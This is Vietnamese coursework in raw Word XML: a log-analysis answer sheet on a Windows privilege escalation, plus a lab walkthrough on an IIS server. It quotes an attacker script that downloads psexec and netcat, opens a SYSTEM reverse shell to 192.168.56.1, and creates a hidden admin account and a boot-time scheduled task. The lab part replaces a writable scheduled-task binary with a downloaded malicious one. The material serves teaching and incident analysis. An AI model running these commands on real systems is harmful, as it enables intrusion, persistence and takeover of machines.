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Q&amp;A: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1. Đọc log và trả lời câu hỏi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- Các tài khoản đã thực thi lệnh whoami?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- Tiến trình nào là tiến trình cha của các tiến trình có commandline là "cmd.exe /c ....."?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- Trong quá trình leo quyen, kẻ tấn công thực hiện các hành vi nào với mục đích gì?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- Kẻ tấn công dùng cách nào để duy trì thực thi trên hệ thống?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- Tham số "-accepteula -nobanner -s -h" được sử dụng cho công cụ nào?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- Kẻ tấn công làm gì sau khi có quyền SYSTEM?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 xml:space="preserve">2. Lab Win Server 2016 - IIS Web. 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 xml:space="preserve">Có sẵn webshell &lt;ip_vm&gt;\ss.aspx có thể thực thi qua form hoặc get request &lt;ip_vm&gt;\ss.aspx?cmd=&lt;command_to_run&gt;. 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Yêu cầu thông qua webshell, thực hiện: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- Thêm tài khoản john vào danh sách tài khoản admin.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3. Tự động bài 2 bằng code/script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B753F" w:rsidRPr="000343DE" w:rsidRDefault="003B753F" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000343DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Bài 1: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B753F" w:rsidRPr="000343DE" w:rsidRDefault="003B753F" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000343DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Các tài khoản đã thực thi lệnh whoami?</w:t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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D387F32" wp14:editId="3B748665">
            <wp:extent cx="1486108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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00549362" wp14:editId="47A6BD0A">
            <wp:extent cx="2237014" cy="8883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400" cy="8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3F" w:rsidRPr="000343DE" w:rsidRDefault="003B753F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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62AF0971" wp14:editId="700A0FFC">
            <wp:extent cx="2429214" cy="1066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41" w:rsidRPr="000343DE" w:rsidRDefault="00045B41" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00045B41" w:rsidRPr="000343DE" w:rsidRDefault="00045B41" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000343DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tiến trình nào là tiến trình cha của các tiến trình có commandline là "cmd.exe /c ....."?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00045B41" w:rsidRPr="000343DE" w:rsidRDefault="00045B41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Tiến trình w3wp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00045B41" w:rsidRPr="000343DE" w:rsidRDefault="00045B41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c:\windows\system32\inetsrv\w3wp.exe -ap "Pool" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipmcbf732e4-0e75-470d-8d56-43b937141ef5 -h "C:\inetpub\temp\apppools\Pool\Pool.config" -w "" -m 0 -t 20 -ta 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF37C1" w:rsidRPr="000343DE" w:rsidRDefault="00DF37C1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343DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Trong quá trình leo quyen, kẻ tấn công thực hiện các hành vi nào với mục đích gì?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systeminfo: Hiển thị thông tin chi tiết về hệ thống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whoami /all: Hiển thị thông tin User, Group, Privileges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net user: Hiển thị các user account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net user vagrant: Hiển thị thông tin chi tiết về</w:t>
      </w:r>
      <w:r w:rsidR="007C60FC" w:rsidRPr="00AF11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> user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net localgroup Administrators</w:t>
      </w:r>
      <w:r w:rsidR="007C60FC" w:rsidRPr="00AF11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Hiển thị thông tin về Group như user trong group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ipconfig /all</w:t>
      </w:r>
      <w:r w:rsidR="007C60FC" w:rsidRPr="00AF11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Hiển thị chi tiết cấu hình mạng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 xml:space="preserve">netsh advfirewall show allprofiles </w:t>
      </w:r>
      <w:r w:rsidR="007C60FC" w:rsidRPr="00AF11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: Hiển thị cấu hình tường lừa cho tất cả các cấu hình hồ sơ (domain, private và public profile) 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tasklist /svc</w:t>
      </w:r>
      <w:r w:rsidR="00BA6D22" w:rsidRPr="00AF11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Liệt kê các services cho mỗi process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sc query windefend</w:t>
      </w:r>
      <w:r w:rsidR="00BA6D22" w:rsidRPr="00AF11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Hiển thị thông tin trạng thái và cấu hình của Windows Defender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powershell Get-MpComputerStatus</w:t>
      </w:r>
      <w:r w:rsidR="00BA6D22" w:rsidRPr="00AF11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Hiển thị thông tin về các chức năng đang bật hoặc tắt của Windows Defender, thông tin phiên bản.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reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System</w:t>
      </w:r>
      <w:r w:rsidR="00CF5B8E" w:rsidRPr="00AF11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5B8E" w:rsidRPr="00AF11D1" w:rsidRDefault="00CF5B8E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Truy vấn thông tin về chính sách hệ thống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dir C:\</w:t>
      </w:r>
      <w:r w:rsidR="00CF5B8E" w:rsidRPr="00AF11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Liệt kê thư mục ở ổ đĩa C:\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dir D:\</w:t>
      </w:r>
      <w:r w:rsidR="00CF5B8E" w:rsidRPr="00AF11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Liệt kê thư mục ở ổ đĩa D:\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mkdir C:\healthcheck</w:t>
      </w:r>
      <w:r w:rsidR="00CF5B8E" w:rsidRPr="00AF11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: Tạo thư mục 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attrib +h /s /d C:\healthcheck</w:t>
      </w:r>
      <w:r w:rsidR="00CF5B8E" w:rsidRPr="00AF11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Đặt thuộc tính cho thư mục vừa tạo +h:hidden /s: áp dụng cho cả các subdir /d: áp dụng cho các thư mục</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5B8E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echo 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  &gt; C:\healthcheck\t2.txt</w:t>
      </w:r>
      <w:r w:rsidR="00CF5B8E" w:rsidRPr="00AF11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5B8E" w:rsidRPr="00AF11D1" w:rsidRDefault="00CF5B8E" w:rsidP="00AF11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Ghi vào file t2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00794050" w:rsidRPr="00AF11D1" w:rsidRDefault="00794050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certutil -decode C:\healthcheck\t2.txt C:\healthcheck\monitor.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5B8E" w:rsidRDefault="00CF5B8E" w:rsidP="00AF11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Sử dụng certutil để giải mã tệp t2.txt vào monitor.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5B8E" w:rsidRPr="000343DE" w:rsidRDefault="00CF5B8E" w:rsidP="00794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Nội dung của tệp monitor.ps1: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lastRenderedPageBreak/>
        <w:t>$ps = "C:\healthcheck\ps.exe"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curl -Uri "http://192.168.56.1:8000/psexec.exe" -OutFile $ps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$user=$(C:\healthcheck\ps.exe -accepteula -nobanner -s -h whoami).replace("\", "_");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$outf = "C:\healthcheck\" +$user+ "_backup.exe";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$inf = "http://192.168.56.1:8000/nc/nc.exe";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curl -Uri $inf -OutFile $outf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$arg = "-accepteula -nobanner -s -h `"" + $outf + "`" 192.168.56.1 4444 -e cmd"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start-process $ps $arg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start-process $ps "-accepteula -nobanner -s -h net.exe user /add backup1 Backup@123"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start-process $ps "-accepteula -nobanner -s -h net.exe localgroup administrators backup1 /add"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5B8E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start-process $ps "-accepteula -nobanner -s -h reg.exe add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v backup1 /t REG_DWORD /f /d 0"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00344EED" w:rsidRPr="000343DE" w:rsidRDefault="00CF5B8E" w:rsidP="00CF5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0343DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>start-process $ps "SCHTASKS /Create /TN `"Task`" /F /SC ONSTART /TR `"powershell -f C:\healthcheck\monitor.ps1`" /RU vagrant /RP vagrant"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00344EED" w:rsidRPr="000343DE" w:rsidRDefault="00344EED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Sau khi có được account vagrant nằm trong group Administrator kẻ tấn công tạo 1 schedule task và chạy task.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF37C1" w:rsidRPr="00AF11D1" w:rsidRDefault="00344EED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SCHTASKS /Create /TN "Task" /F /SC HOURLY /TR "powershell -f C:\healthcheck\monitor.ps1" /RU vagrant /RP vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00344EED" w:rsidRPr="00AF11D1" w:rsidRDefault="00344EED" w:rsidP="00AF11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11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SCHTASKS /run /tn "Task"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00344EED" w:rsidRPr="000343DE" w:rsidRDefault="00344EED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Sau khi task được chạy với acc trong group admin</w:t>
      </w:r>
      <w:r w:rsidR="008B0EA5" w:rsidRPr="000343DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>istrator</w:t>
      </w:r>
      <w:r w:rsidRPr="000343DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nó sẽ làm một số nhiệm vụ sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00344EED" w:rsidRPr="000343DE" w:rsidRDefault="00344EED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 xml:space="preserve">Mở 1 session cmd với quyền system(-s) trên máy attacker </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3819" w:rsidRPr="000343DE" w:rsidRDefault="00344EED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Tạo</w:t>
      </w:r>
      <w:r w:rsidR="009B3819" w:rsidRPr="000343DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tài khoản backup1 và thêm vào group administrators. Thêm tài khoản vào registry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3819" w:rsidRPr="000343DE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Tạo Task khởi chạy tệp minitor.ps1 mỗi khi khởi động</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3819" w:rsidRPr="000343DE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343DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Kẻ tấn công dùng cách nào để duy trì thực thi trên hệ thống?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3819" w:rsidRPr="000343DE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Tạo tài khoản backup1 và tạo schedule task “Task” thực thi mỗi khi khởi động</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3819" w:rsidRPr="000343DE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343DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Tham số "-accepteula -nobanner -s -h" được sử dụng cho công cụ nào?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB609F" w:rsidRDefault="009B3819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Psexec</w:t>
      </w:r>
      <w:r w:rsidR="00BB609F" w:rsidRPr="000343DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000343DE" w:rsidRPr="000343DE" w:rsidRDefault="000343DE" w:rsidP="00045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343DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Kẻ tấn công làm gì sau khi có quyền SYSTEM?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB609F" w:rsidRDefault="00A25121" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000343DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kẻ tấn công gõ lệnh whoami, net user, netsh  advfirewall set allprofiles state off</w:t>
      </w:r>
      <w:r w:rsidR="00DA55E9" w:rsidRPr="000343DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(Tắt tường lửa)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C21A88" w:rsidRDefault="00C21A88" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C21A88" w:rsidRDefault="00C21A88" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C21A88" w:rsidRDefault="00C21A88" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C21A88" w:rsidRDefault="00C21A88" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C21A88" w:rsidRDefault="00C21A88" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00086E9D" w:rsidRDefault="00086E9D" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00086E9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Bài 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00086E9D" w:rsidRDefault="00C21A88" w:rsidP="003B753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Kiểm tra users trên máy:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C21A88" w:rsidRDefault="00C21A88" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21A88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55290CAD" wp14:editId="5CE4DB80">
            <wp:extent cx="4850602" cy="952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426" cy="9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88" w:rsidRDefault="00C21A88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Thông tin chi tiết về user John</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C21A88" w:rsidRDefault="00C21A88" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21A88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51268B23" wp14:editId="04DE6974">
            <wp:extent cx="4109357" cy="2411613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357" cy="24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88" w:rsidRDefault="00C21A88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về Group Administrator không có user John</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C21A88" w:rsidRDefault="00C21A88" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21A88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06950D80" wp14:editId="1BCA039B">
            <wp:extent cx="4540247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63" cy="12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8D" w:rsidRDefault="0066678D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tin về </w:t>
      </w:r>
      <w:r w:rsidR="002F4E1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>current user account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5250" w:rsidRDefault="0066678D" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066678D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37F6001E" wp14:editId="0E61E23A">
            <wp:extent cx="4245429" cy="31718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42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F7" w:rsidRDefault="00B708F7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Hiển thị tất cả các tệp trong ổ C:\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B708F7" w:rsidRDefault="00B708F7" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B708F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0534EFF4" wp14:editId="46A49BFF">
            <wp:extent cx="3264877" cy="19470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964" cy="19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F7" w:rsidRDefault="00B708F7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tự tìm kiếm backup(thư mục không mặc định), inetpub là thư mục web server(có thể tìm được log hoặc password trong các file config), Program Files/x86,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B70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ProgramData tìm kiếm những application không phải là mặc định</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B43CF" w:rsidRDefault="001B43CF" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B43CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1834B305" wp14:editId="758E9CE5">
            <wp:extent cx="4179277" cy="11488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832" cy="11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CF" w:rsidRDefault="001B43CF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schedule task:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B43CF" w:rsidRDefault="001B43CF" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B43CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59EFFC2D" wp14:editId="2A771D60">
            <wp:extent cx="4191000" cy="334653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174" cy="33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CF" w:rsidRDefault="001B43CF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Kiểm tra quyền của thư mục</w:t>
      </w:r>
      <w:r w:rsidR="009A3E2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và tệp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B43CF" w:rsidRDefault="009A3E2F" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3E2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29E8EFAC" wp14:editId="627AA861">
            <wp:extent cx="5943600" cy="128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2F" w:rsidRDefault="009A3E2F" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3E2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73932CD2" wp14:editId="4DC4DBA8">
            <wp:extent cx="5943600" cy="1204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2F" w:rsidRDefault="009A3E2F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BUILTIN\Users có quyền Full control(F)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A35E3" w:rsidRDefault="002B4488" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4488">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A4163DA" wp14:editId="66D85B18">
            <wp:extent cx="5943600" cy="899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88" w:rsidRPr="002B4488" w:rsidRDefault="002B4488" w:rsidP="003B753F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 xml:space="preserve">Đổi tên tệp backup.exe gốc bằng lệnh sau: </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4488">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>move "C:\backup\monitor db\backup.exe" "C:\backup\monitor db\backup.exe.bak"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A3E2F" w:rsidRDefault="002B4488" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4488">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B2F9B09" wp14:editId="4E596B57">
            <wp:extent cx="5943600" cy="1060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88" w:rsidRDefault="002B4488" w:rsidP="003B753F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 xml:space="preserve">Tải file malicious lên máy: </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4488">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>powershell Invoke-WebRequest -Uri 'http://192.168.56.102:8080/backup.exe' -OutFile 'C:\backup\monitor db\backup.exe'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D608F4" w:rsidRDefault="00D608F4" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D608F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FC45DB4" wp14:editId="2DBECFB7">
            <wp:extent cx="5943600" cy="849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F4" w:rsidRDefault="00D608F4" w:rsidP="003B753F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 xml:space="preserve">Run Task: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D608F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>schtasks /run /tn "\admin\thing\Backup"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D608F4" w:rsidRDefault="00D608F4" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D608F4" w:rsidRDefault="00D608F4" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D608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2F0039" wp14:editId="4C8961D3">
